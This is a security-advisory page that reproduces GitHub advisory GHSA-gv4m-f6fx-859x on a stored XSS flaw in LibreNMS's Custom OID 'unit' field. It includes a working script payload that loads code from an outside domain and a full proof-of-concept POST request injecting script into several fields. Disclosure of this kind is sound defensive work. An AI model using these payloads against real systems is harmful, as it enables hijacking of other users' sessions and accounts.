Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-gv4m-f6fx-859x

GitHub Security Advisory

LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/print-customoid.php

✓ GitHub Reviewed HIGH Has CVE
View on GitHub

Advisory Details

### Summary
A Stored Cross-Site Scripting (XSS) vulnerability in the "Custom OID" tab of a device allows authenticated users to inject arbitrary JavaScript through the "unit" parameter when creating a new OID. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized actions.

### Details
When creating a new OID for a device, an attacker can inject an XSS payload into the "unit" parameter. This payload is reflected in the "Unit" column of the table displayed in the "Custom OID" tab of the device.

The payload used to exploit this vulnerability is:
```<script/src=//15.rs>```

Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.

The vulnerability is due to improper sanitization of the "unit" parameter before rendering it in the HTML output. The sink is as follows:
https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/print-customoid.php#L90

### PoC
1. Create a new OID for a device using the following payload in the "unit" parameter:
```<script/src=//15.rs>```
2. Save the OID.
3. Navigate to the "Custom OID" tab of the device.
4. Observe that the injected script executes in the "Unit" column of the table.

Example Request:
```http
POST /ajax_form.php HTTP/1.1
Host: <your_host>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-TOKEN: <your_token>
X-Requested-With: XMLHttpRequest
Cookie: <your_cookie>

device_id=15&device_name=test4'&ccustomoid_id=2&type=customoid&action=save&name=test1<script>{onerror=alert}throw+'OID'</script>&oid=test2<script>{onerror=alert}throw+'OID'</script>&unit=<script/src=//15.rs>&divisor=1&multiplier=1&user_func=test4<script>{onerror=alert}throw+'OID'</script>&limit=0&limit_low=0&limit_warn=0&limit_low_warn=0&passed=on
```

### Impact

This vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users' sessions when they visit the "Custom OID" tab of the device. This could lead to the compromise of user accounts and unauthorized actions being performed on their behalf.

Affected Packages

Packagist librenms/librenms
Affected versions: 0 (fixed in 24.10.0)

Related CVEs

CVE-2024-51497

Key Information

GHSA ID
GHSA-gv4m-f6fx-859x
Published
November 15, 2024 3:46 PM
Last Modified
November 15, 2024 8:50 PM
CVSS Score
7.5 /10
Primary Ecosystem
Packagist
Primary Package
librenms/librenms
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 27, 2025 6:19 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.